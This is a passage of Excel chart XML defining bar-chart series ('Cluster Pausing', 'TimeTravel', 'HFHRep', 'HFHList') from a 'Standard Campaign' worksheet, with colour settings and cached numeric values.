                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$A$2:$A$77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0-CA6E-4486-A1CF-C9D4F1E985B3}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="12"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000009-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="13"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000A-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:val>
            <c:numRef>
              <c:f>'Standard Campaign'!$C$2:$C$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
                <c:pt idx="9">
                  <c:v>800</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1000</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>1500</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>1600</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>1400</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$C$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>Cluster Pausing</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$A$2:$A$77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1-CA6E-4486-A1CF-C9D4F1E985B3}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:val>
            <c:numRef>
              <c:f>'Standard Campaign'!$D$2:$D$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
                <c:pt idx="0">
                  <c:v>20</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>20</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>50</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>75</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>100</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>150</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>175</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>200</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>250</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$D$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>TimeTravel</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$A$2:$A$77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2-CA6E-4486-A1CF-C9D4F1E985B3}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="12"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000008-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="13"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000007-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:val>
            <c:numRef>
              <c:f>'Standard Campaign'!$E$2:$E$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
                <c:pt idx="11">
                  <c:v>500</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>600</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>500</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$E$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>HFHRep</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredCategoryTitle>
                <c15:cat>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$A$2:$A$77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3-CA6E-4486-A1CF-C9D4F1E985B3}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="34"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000B-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="35"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000C-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="36"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000D-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="37"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000E-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="38"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000F-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="39"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000010-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="40"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000011-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="41"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000012-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="42"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000013-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="43"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000014-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="44"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000015-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="45"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000016-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="46"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000017-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="47"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000018-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="48"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000019-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="49"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000001A-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="50"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000001B-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="51"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000001C-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="52"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000001D-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="53"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000001E-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="54"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000001F-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="55"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000020-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="56"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000021-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="57"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000022-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="58"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000023-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="59"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000024-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="60"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000025-CA6E-4486-A1CF-C9D4F1E985B3}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:val>
            <c:numRef>
              <c:f>'Standard Campaign'!$F$2:$F$77</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="76"/>
                <c:pt idx="14">
                  <c:v>2000</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>2100</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>2150</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>2500</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2450</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>2300</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>2200</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>2175</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>2050</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>2000</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>1900</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>1965</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>1875</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>1972</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>1999</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>2050</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>2060</c:v>
                </c:pt>
                <c:pt idx="34">
                  <c:v>2150</c:v>
                </c:pt>
                <c:pt idx="35">
                  <c:v>2101</c:v>
                </c:pt>
                <c:pt idx="36">
                  <c:v>2062</c:v>
                </c:pt>
                <c:pt idx="37">
                  <c:v>1987</c:v>
                </c:pt>
                <c:pt idx="38">
                  <c:v>1946</c:v>
                </c:pt>
                <c:pt idx="39">
                  <c:v>1873</c:v>
                </c:pt>
                <c:pt idx="40">
                  <c:v>1783</c:v>
                </c:pt>
                <c:pt idx="41">
                  <c:v>1773</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>1731</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>1711</c:v>
                </c:pt>
                <c:pt idx="44">
                  <c:v>1623</c:v>
                </c:pt>
                <c:pt idx="45">
                  <c:v>1560</c:v>
                </c:pt>
                <c:pt idx="46">
                  <c:v>1527</c:v>
                </c:pt>
                <c:pt idx="47">
                  <c:v>1450</c:v>
                </c:pt>
                <c:pt idx="48">
                  <c:v>1404</c:v>
                </c:pt>
                <c:pt idx="49">
                  <c:v>1386</c:v>
                </c:pt>
                <c:pt idx="50">
                  <c:v>1343</c:v>
                </c:pt>
                <c:pt idx="51">
                  <c:v>1269</c:v>
                </c:pt>
                <c:pt idx="52">
                  <c:v>1203</c:v>
                </c:pt>
                <c:pt idx="53">
                  <c:v>1184</c:v>
                </c:pt>
                <c:pt idx="54">
                  <c:v>1147</c:v>
                </c:pt>
                <c:pt idx="55">
                  <c:v>1122</c:v>
                </c:pt>
                <c:pt idx="56">
                  <c:v>1054</c:v>
                </c:pt>
                <c:pt idx="57">
                  <c:v>1050</c:v>
                </c:pt>
                <c:pt idx="58">
                  <c:v>1025</c:v>
                </c:pt>
                <c:pt idx="59">
                  <c:v>1017</c:v>
                </c:pt>
                <c:pt idx="60">
                  <c:v>1100</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
              <c15:filteredSeriesTitle>
                <c15:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>'Standard Campaign'!$F$1</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>HFHList</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c15:tx>
              </c15:filteredSeriesTitle>
            </c:ext>
